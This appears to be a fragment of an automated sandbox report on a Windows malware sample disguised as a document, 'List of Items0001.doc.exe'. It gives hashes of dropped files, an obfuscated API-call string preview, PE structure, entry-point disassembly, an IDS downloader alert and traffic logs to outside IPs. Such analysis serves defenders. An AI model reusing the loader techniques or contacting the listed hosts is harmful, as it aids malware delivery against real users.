                            • Report size getting too big, too many NtOpenKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            Time      Type             Description
                            05:26:34  API Interceptor  28103795x Sleep call for process: TapiUnattend.exe modified
                                              Process:C:\Windows\SysWOW64\TapiUnattend.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                              Category:dropped
                                              Size (bytes):229376
                                              Entropy (8bit):0.9085960794285802
                                              Encrypted:false
                                              SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                              MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                              SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                              SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                              SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 1Gqt1JqOZN.exe, Detection: malicious
                                              • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
                                              • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious
                                              • Filename: f_00622c.exe, Detection: malicious
                                              • Filename: , Detection: malicious
                                              • Filename: 47#U0627.vbs, Detection: malicious
                                              • Filename: Request for Quotation - sample catalog.vbs, Detection: malicious
                                              • Filename: 47#U0627.vbs, Detection: malicious
                                              • Filename: Request for Quotation - sample catalog.vbs, Detection: malicious
                                              Reputation:high, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1080908
                                              Entropy (8bit):2.875605533482657
                                              Encrypted:false
                                              SSDEEP:6144:z96o0LGroRBMdAphQPkzYLhxOpDew3C89JhfXzf6:z9TCvQPHL4aw3pf6
                                              MD5:525F2C194B2522306F9CBBAF72EB65BE
                                              SHA1:A436849F9F85390C60E751B361896AB962AC1115
                                              SHA-256:4051A1EA370F0B8FEABEF0DF3104AB6CC0584E42A8A26EF730A29313F3625256
                                              SHA-512:44702EDB2C29EC7112C1A06AD93983AC22D6C97F288D76B74624C7BA409F25048A385F6EC50E3A972C0F7C65A9DD7742797E3D3C9C04F2BE09556698461FC6F0
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):206833
                                              Entropy (8bit):7.338969359279965
                                              Encrypted:false
                                              SSDEEP:3072:kasfm803icQJrRdwRBMdM4EphQPZeu7UzYbgohSF8XZYX5Dew3v:Po0LGroRBMdAphQPkzYLhxOpDew3v
                                              MD5:3D055AFB37E16E88BADB32DE3B201909
                                              SHA1:3B91D1FF871C97C4AB6AAFEEB3E05DA7AF6D0596
                                              SHA-256:8A6D99C63BEC12EE848D9549A01841BE447A929AC077F9D18100858688EC30B7
                                              SHA-512:25B11673EF9B9C3BF77A8ED6E9EC2B41B58FF01849B86E0970709484CA3BFCDD325336B9FCF53FFE34C2018ADA9575BEDCBF4D27A9141E5B58265971DC2C0D30
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):8667
                                              Entropy (8bit):4.47483795532895
                                              Encrypted:false
                                              SSDEEP:96:NgJmkFdWaDvgS7Yw0kBFKRftSFOAuiYI9vhFcA7Mb7rJdnK6LUgV:6s+4yp7HKLE9vhPQHSk
                                              MD5:FB58B8D630794DA1796812AE1E089756
                                              SHA1:41D5D5FAB4C3685F143C80C07099FFD9D85B3F92
                                              SHA-256:1679776C0F6F48276496D575BCB8B927CF547A40F1BCDCF1957A1B7FAA2FE010
                                              SHA-512:CA20D1ED9CBACEEACDE617A31C67D28E6AC314C58F230243AEE00AE8D92850CFABFD96105F89E7D32CE7157F9C3E4B02881351DB01C9D908505E3AC8F5589134
                                              Malicious:false
                                              Preview:...++++.!!...qq.......p.........t.o.............G......q...........v.w.........................k.l.e..Xr...n..pe.>>l.nn3..02...:...:...C...r...e.p.a...t...e...F...i...l...e...A...(...m... ...r...4... ...,.%. ...i... .!!0...x...8...0..G0..M0...0...0...0...0...,... ...i... ..,0...,... ...p... .*.0...,..! ...i... ...4...,... ...i... ...0.**x...8...0...,... ...i... ...0...)...i.....oor...8.......k...e..hr..8n...e...l...3..|2...:...:...S...e...t...F...i...l...e...P..Do...i...n...t...e...r...(...i... ..Wr.,.8..%,.'' ...i... ..02...3.C.0.yy1...2..h ...,... ...i... ...0...,...i.\. ...0...)...i.......r...4.......k...e...r...n...e...l...3...2.<.:...:...V.._i...r...t...u...a...l...A...l...l..4o...c...(...i... ...0...,...i... ...1...2...6...6..t4...8...3.,.2...,..Z .ssi... ...0.v.x...3...0.O.0...0...,... ...i... .220...x...4...0...)...p......ur...2.......k...e...r...n...e...l..'3...2..C:.2.:...R...e...a...d...F...i..Ol...e...(...i... ...r...8...,... ...i... ..ur..s2...,... ...i... .).1...2...6...6
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:Matlab v4 mat-file (little endian) \371, numeric, rows 0, columns 0
                                              Category:dropped
                                              Size (bytes):377510
                                              Entropy (8bit):1.258274749344514
                                              Encrypted:false
                                              SSDEEP:768:GhGocb02kUfCQgJQDnBntGgPsKU8ujjrf4Sfraf2bTtnCIXI6qnpqsM7a3U1coe3:G29XJZYjwfg22ye0E3l24lM
                                              MD5:4687ED84FC3526E5A36E3D15034E780C
                                              SHA1:7C1FDD5DACE796E5000B55FDCA8B0D8E80AB4107
                                              SHA-256:FEFDA5AF3BFAE55E417CEBABC38D62F287F6827ED742B0C91B1AF7DAD3DDF9D9
                                              SHA-512:E8DB150309F268BAAD995B1B247768821096843E4FAE025020FCAA68E038902E0023128C9CE06A0B3322ED99A1A2423E087F6736F51F85E47514676DFF0060D2
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6476
                                              Entropy (8bit):1.3027420820992792
                                              Encrypted:false
                                              SSDEEP:48:Xuy2tvaXLsWkXsiltrNmaimTdF+YdaWPO:+Jdaw/vRmbmTdFddaWPO
                                              MD5:6834FEE46C2094A680AFBE721BCD6CD3
                                              SHA1:040EBC023C6BC9A13948730D79E73A0BA9A57B65
                                              SHA-256:F52C9A95E500444E13A10DD9DACD739ED6035E18DA0FCB92F3346D8D33A5E976
                                              SHA-512:307A2C0F978F41C8DB546151E9A1E170813056B9B2E7D3D8F2A65BD7413BC5B54E90FD9810D054383A3F730B6CB61BDC37B2B12A4BD5E8425C5E214232F7E030
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):119598
                                              Entropy (8bit):1.2437975192637685
                                              Encrypted:false
                                              SSDEEP:768:crjGZ7nfcv98Sc6/OhLWGtyl0fJdbYmpsdwJMXf0AZIqYaN/Pa:qF8ywBWp0Wa
                                              MD5:ADAF3D47FB43EB83807A8951C454FA92
                                              SHA1:3743EF34102EE1FAFF632A73BD0172FCE0C97D30
                                              SHA-256:70B10041BEDF91AC13DCA35C252B4B407B5E22DC4FBD5C94AB28FA4A4AFAB85B
                                              SHA-512:2B966878DA94F956E0DEA31C1C679F35C06CFE8B04B31EBD55FC46799C8E4F2F050AA15040237533A72EF0B8DFBF5484C229A3F28F4808200222722F7CD84E28
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):207803
                                              Entropy (8bit):1.2442537982642219
                                              Encrypted:false
                                              SSDEEP:768:lYuBHkWBnyhlGVFYv6mBTFHO0MweR2iicYDXm58MkWhWzNNzUD0I8NJ1PQDE65d/:6z6KqM6
                                              MD5:7605A8B0A0B86CE8D9BAD360EAC35323
                                              SHA1:2CAF427A0458A06D127FB5984B6F8C78F8CC8143
                                              SHA-256:4FD04112F16EC0A2179F096272D24E9F61C97376CC7A4466E7CA5562CA48B0B5
                                              SHA-512:15C5B1EBFEB646087B01919331CAA2B1651E4B0F2021BDCDC44C4CDE2D48011936A80E13EDC3A47A24489C04EEA1CDBECD10FFF151A049606C71A46B953E2F9F
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):112920
                                              Entropy (8bit):1.269802012029701
                                              Encrypted:false
                                              SSDEEP:768:uGPdsi4uzEUQ40kJIoRDm/9vvpv72md42nQi+2l+:L4HkI2Yv4mdbpw
                                              MD5:C12622250F68D3ED555732D69367D4B2
                                              SHA1:936B6ED917DF066689CAE99C9621230023A86CC2
                                              SHA-256:599EF46FC90AD1B47CF05FC8DB7FA9D7EBA17905F6711BF2D53EA1E229756DDC
                                              SHA-512:D1B643D3B4432FA27DCCF6D9F7BF5ACC73A38B6A169AF9F56A473D010C205C931FBECF2B9A7854973998D96A752C32336953E7F5C1629C70451AA12A613356B0
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):19333
                                              Entropy (8bit):1.2883608656481567
                                              Encrypted:false
                                              SSDEEP:96:44Qnmg2gF2DaU1b5tJPzgnA0tZiP54wYinr7C9lUhAZtnytK:41nVy11lPzgASiP5/Yw7QuAZktK
                                              MD5:655BCB5400852532F15210B2845BBE47
                                              SHA1:9C090B377ED197C11FDAE3388D2E0B2A57CE0441
                                              SHA-256:EBAE19C75FB454BC179D2DC010E8C8C78DCA2F6E46F157FA143737A5FF7DE449
                                              SHA-512:1E22606392BAFDE72710E0B6D0A18F92BAEE3D7B91A80AB73B1A54BFDB7B5606B0A852ABE82169EA378B5F093CB529EB0F97FBEF90776D2085FA6D943DF990CA
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\List of Items0001.doc.exe
                                              File Type:ASCII text, with very long lines (361), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):471
                                              Entropy (8bit):4.179338005320388
                                              Encrypted:false
                                              SSDEEP:6:rlP8QkBAMyzshoUR2YmgeqBSSjrqtNAXapaV/GDFcsxwqCKewWaE9tmAtzFpUpcf:91kyMf+ONwSaSXKaZQfwT9LzF4E
                                              MD5:2DB25422A7D25E430640B19479BA11A7
                                              SHA1:43772910A8A6BCD716F1E627E35DE5F3FCA29A4B
                                              SHA-256:AD7C29CC9DCD5293AA5F7328C5F2C93004497EAF4816BB8B72F2FAB7A36D4BFB
                                              SHA-512:1A4CB182DCB01D3D29DF1ECEDF40254A2A30D8291D52DD73BA7F34B0E41145E512B5DCC02E2321916FFCF7A44E6D84E1976C93A7A74CE81A61073801FA7B698F
                                              Malicious:false
                                              Preview:bents fdemiddelet zydecos wirings disallowed seniorerne neuralgy maleriske krogsternes anlggenes paaskelrdag..skruegangenes vault xantheins chefkonomernes svrmetidernes internationale,cosinesses orddelingsprogram solstraalefortlling peytrels crucibles sandbankernes nationaliseres,aronsson fastkurs crpe teaterforestillings oxynaphthoic,storifying faveolate turgesce renovationsarbejderes indvarsler trdemller unuanceredes,poolenes alif bespottelsernes bioassays danisme,
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.2747241603356665
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:List of Items0001.doc.exe
                                              File size:632'024 bytes
                                              MD5:6d3da95a3e1f5861a54c30dd61f80c02
                                              SHA1:74e6fb42c2de33b6b9dcd45aa86db1b99c8c2135
                                              SHA256:9c2d1e2dc9170158a8fef8393fd58306f918ceb15701465c4e21040be94233c2
                                              SHA512:70c23ed78a8d369c78073504d6bc4b5fd1ee89e7708318706d4c4108e2d2257381634b12326d546eb51c76fefc0d98cf7863c4ac6bc7857dfe46217ce4a87302
                                              SSDEEP:6144:YYa6vEsNe5YZ0thEQftDn2IeudqgiYxOJ2Hd2Wn49rVzOpb4o4/aZJZCrXmxhz3f:YY+T5LbtDOgiYQQ9tUVm4d2d5c737+
                                              TLSH:35D4D0A3BD98CDA6FC6A5070B42E5557EBF11DF3D291893BB4D2FE1A4032287041B25B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                              Icon Hash:3b71b88888f83448
                                              Entrypoint:0x403640
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:61259b55b8912888e90f516ca08dc514
                                              Signature Valid:false
                                              Signature Issuer:CN="Antennernes antisubmarine ", O=Bagerierne, L=Rennes, S=Bretagne, C=FR
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 28/10/2023 06:29:24 27/10/2026 05:29:24
                                              Subject Chain
                                              • CN="Antennernes antisubmarine ", O=Bagerierne, L=Rennes, S=Bretagne, C=FR
                                              Version:3
                                              Thumbprint MD5:57377B73AE53C9FF7C3BB15F7883BDC5
                                              Thumbprint SHA-1:DA4B86C194BEB9A8A47B0BFAFCF7E3CAA16B0493
                                              Thumbprint SHA-256:B85E5E87CAB310946438AF4DA9E79E1164853C6C4FA39B888FF1F58A3D4A80EA
                                              Serial:1C3CD644B75CB8DEB5BAD2BF0CCA5725FE244D32
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 000003F4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [ebp-14h], ebx
                                              mov dword ptr [ebp-04h], 0040A230h
                                              mov dword ptr [ebp-10h], ebx
                                              call dword ptr [004080C8h]
                                              mov esi, dword ptr [004080CCh]
                                              lea eax, dword ptr [ebp-00000140h]
                                              push eax
                                              mov dword ptr [ebp-0000012Ch], ebx
                                              mov dword ptr [ebp-2Ch], ebx
                                              mov dword ptr [ebp-28h], ebx
                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007FBB70A9EE7Ah
                                              lea eax, dword ptr [ebp-00000140h]
                                              mov dword ptr [ebp-00000140h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [ebp-0000012Ch]
                                              mov ecx, dword ptr [ebp-00000112h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [ebp-26h], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [ebp-2Ch], ax
                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                              jnc 00007FBB70A9EE4Ah
                                              and word ptr [ebp-00000132h], 0000h
                                              mov eax, dword ptr [ebp-00000134h]
                                              movzx ecx, byte ptr [ebp-00000138h]
                                              mov dword ptr [0042A318h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [ebp-0000013Ch]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [ebp-2Ch]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x42b28 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x99b70 | 0x968 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x6676 | 0x6800 | 6f5abe9eeda26ee84b3c1ed1a6c82001 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x8000 | 0x139a | 0x1400 | 8c5edfd8ff9cc0135e197611be38ca18 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0xa000 | 0x20378 | 0x600 | 4b2421975c21b032f7ea000f5e7f9fbf | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata | 0x2b000 | 0x24000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc | 0x4f000 | 0x42b28 | 0x42c00 | 30c07db9666792573bae5eb1979e3a1c | False | 0.27640010533707865 | data | 5.795862006125686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0x4f208 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.27417004467852174
                                              RT_DIALOG | 0x91230 | 0x100 | data | English | United States | 0.5234375
                                              RT_DIALOG | 0x91330 | 0x11c | data | English | United States | 0.6056338028169014
                                              RT_DIALOG | 0x91450 | 0xc4 | data | English | United States | 0.5918367346938775
                                              RT_DIALOG | 0x91518 | 0x60 | data | English | United States | 0.7291666666666666
                                              RT_GROUP_ICON | 0x91578 | 0x14 | data | English | United States | 1.1
                                              RT_VERSION | 0x91590 | 0x258 | data | English | United States | 0.53
                                              RT_MANIFEST | 0x917e8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                              DLL | Import
                                              ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                              SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                              ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                              COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                              GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                              Language of compilation system | Country where language is spoken | Map
                                              English | United States |
                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                              2024-09-24T11:25:42.306604+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.30 | 49892 | 162.213.195.46 | 443 | TCP
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Sep 24, 2024 11:26:12.753247023 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753307104 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753328085 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.753366947 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753448009 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753547907 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.753568888 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753632069 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.753679037 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753788948 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753894091 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.753954887 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.753988028 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.754215002 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.799247980 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.799352884 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.799510002 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.845931053 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.846040010 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.846172094 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.893543005 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.893651009 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.893724918 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.893794060 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:12.893799067 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.894046068 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:12.898256063 CEST4989380192.168.11.30208.91.197.27
                                              Sep 24, 2024 11:26:13.031954050 CEST8049893208.91.197.27192.168.11.30
                                              Sep 24, 2024 11:26:28.316533089 CEST4989480192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:28.631469011 CEST8049894206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:28.631743908 CEST4989480192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:28.640413046 CEST4989480192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:28.955476999 CEST8049894206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:28.955558062 CEST8049894206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:28.955796003 CEST4989480192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:30.155662060 CEST4989480192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:31.174809933 CEST4989580192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:31.500447989 CEST8049895206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:31.500695944 CEST4989580192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:31.509268999 CEST4989580192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:31.834867954 CEST8049895206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:31.834949017 CEST8049895206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:31.835211039 CEST4989580192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:33.014394045 CEST4989580192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:34.032418966 CEST4989680192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:34.350327969 CEST8049896206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:34.350536108 CEST4989680192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:34.359229088 CEST4989680192.168.11.30206.119.82.131
                                              Sep 24, 2024 11:26:34.677304029 CEST8049896206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:34.677369118 CEST8049896206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:34.677422047 CEST8049896206.119.82.131192.168.11.30
                                              Sep 24, 2024 11:26:34.678019047 CEST4989680192.168.11.30206.119.82.131
